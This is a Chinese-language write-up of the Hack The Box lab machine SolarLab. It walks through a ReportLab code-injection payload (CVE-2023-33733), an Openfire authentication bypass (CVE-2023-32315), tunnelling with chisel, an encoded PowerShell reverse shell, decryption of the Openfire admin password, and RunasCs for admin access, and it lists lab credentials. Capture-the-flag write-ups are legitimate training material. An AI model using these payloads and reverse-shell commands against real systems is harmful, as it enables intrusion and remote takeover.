HTB SolarLab

SolarLab (Windows · Medium)

CVE-2023-33733 + CVE-2023-32315

枚举

添加hosts

1
10.10.11.16	solarLab.htb

namp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
nmap -A -p- -v -T4 solarlab.htb

Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (0.28s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: SolarLab Instant Messenger
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
6791/tcp open  http          nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-07-23T04:44:44
|_  start_date: N/A
|_clock-skew: -8m12s

80正常访问,6791跳转到report.solarlab.htb:6791,添加hosts

445 SMB

image-20240723143120987

details-file.xlsx

image-20240723143222270

gobuster

1
2
gobuster dns -d solarlab.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 100
Nothing

dirsearch

1
2
3
4
dirsearch -u http://solarlab.htb/
Nothing
dirsearch -u http://report.solarlab.htb:6791/
Nothing

solarlab.htb

image-20240723130845288

report.solarlab.htb:6791

image-20240723130906563

通过SMB获取的xlsx数据爆破

image-20240723144553010

image-20240723144522690

没有爆破出来,看网上wp是 BlakeB:ThisCanB3typedeasily1@ (缩写)

Shell

image-20240723150029165

有四个功能,都能生成 PDF,搜索相关漏洞

image-20240723145839535

image-20240723150617112

1
2
3
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('curl http://10.10.16.30') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>

测试

image-20240723155557565

反弹shell,工具生成powershell

image-20240723160458541

User flag: C:\Users\blake\Desktop\user.txt

image-20240731164556823

1
2
3
blakeb:ThisCanB3typedeasily1@ 
alexanderk:HotP!fireguard 
claudias:007poiuytrewq

C:Users 下发现了 openfire

image-20240801125828555

image-20240731164758899

横向移动

image-20240731171843212

传 chisel.exe

1
2
3
4
5
# kali
python3 -m http.server

# 靶机
Invoke-WebRequest -Uri "http://10.10.16.30/chisel.exe" -OutFile "C:\Users\blake\Documents\chisel.exe"

image-20240801103203530

chisel

反向代理

1
2
./chisel server -p 12345 --reverse --socks5					# kali
./chisel.exe client 10.10.16.30:12345 R:9090:127.0.0.1:9090	# 靶机

image-20240801111454668

google search

image-20240801111647520

找到一个身份验证绕过的,利用

image-20240801111924887

image-20240801112541646

继续利用CVE

image-20240801112526895

image-20240801112611649

切换到 system command 就可以RCE了

image-20240801112916526

反弹shell,工具生成

1
2
3
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMwAwACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

nc -lvnp 4444

image-20240801113437327

权限提升

embedded-db,有数据库先看,C:\Program Files\Openfire\embedded-db\openfire.script

从OFUSER表结构来看,有明文密码,也有加密密码

1
CREATE MEMORY TABLE PUBLIC.OFUSER(USERNAME VARCHAR(64) NOT NULL,STOREDKEY VARCHAR(32),SERVERKEY VARCHAR(32),SALT VARCHAR(32),ITERATIONS INTEGER,PLAINPASSWORD VARCHAR(32),ENCRYPTEDPASSWORD VARCHAR(255),NAME VARCHAR(100),EMAIL VARCHAR(100),CREATIONDATE VARCHAR(15) NOT NULL,MODIFICATIONDATE VARCHAR(15) NOT NULL,CONSTRAINT OFUSER_PK PRIMARY KEY(USERNAME))

admin

1
INSERT INTO OFUSER VALUES('admin','gjMoswpK+HakPdvLIvp6eLKlYh0=','9MwNQcJ9bF4YeyZDdns5gvXp620=','yidQk5Skw11QJWTBAloAb28lYHftqa0x',4096,NULL,'becb0c67cfec25aa266ae077e18177c5c3308e2255db062e4f0b77c577e159a11a94016d57ac62d4e89b2856b0289b365f3069802e59d442','Administrator','admin@solarlab.htb','001700223740785','0')

google search,找解密脚本

image-20240801114349067

还需要一个key

1
INSERT INTO OFPROPERTY VALUES('passwordKey','hGXiFzsKaAeYLjn',0,NULL)

image-20240801120851215

impacket-smbexec

连接,不能使用 cd

1
2
3
impacket-smbexec administrator:'ThisPasswordShouldDo!@'@solarlab.htb
# [-] You can't CD under SMBEXEC. Use full paths.
type C:\Users\Administrator\Desktop\root.txt

evil-winrm

连不上

1
evil-winrm -i 10.10.11.16 -u administrator -p 'ThisPasswordShouldDo'

RunasCS

通过powershell传到靶机上

1
2
3
Invoke-WebRequest -Uri http://10.10.16.30/RunasCs.exe -OutFile C:\Users\blake\Documents\RunasCs.exe

./RunasCs.exe administrator ThisPasswordShouldDo!@ powershell -r 10.10.16.30:6666

image-20240801125558440

⬆︎TOP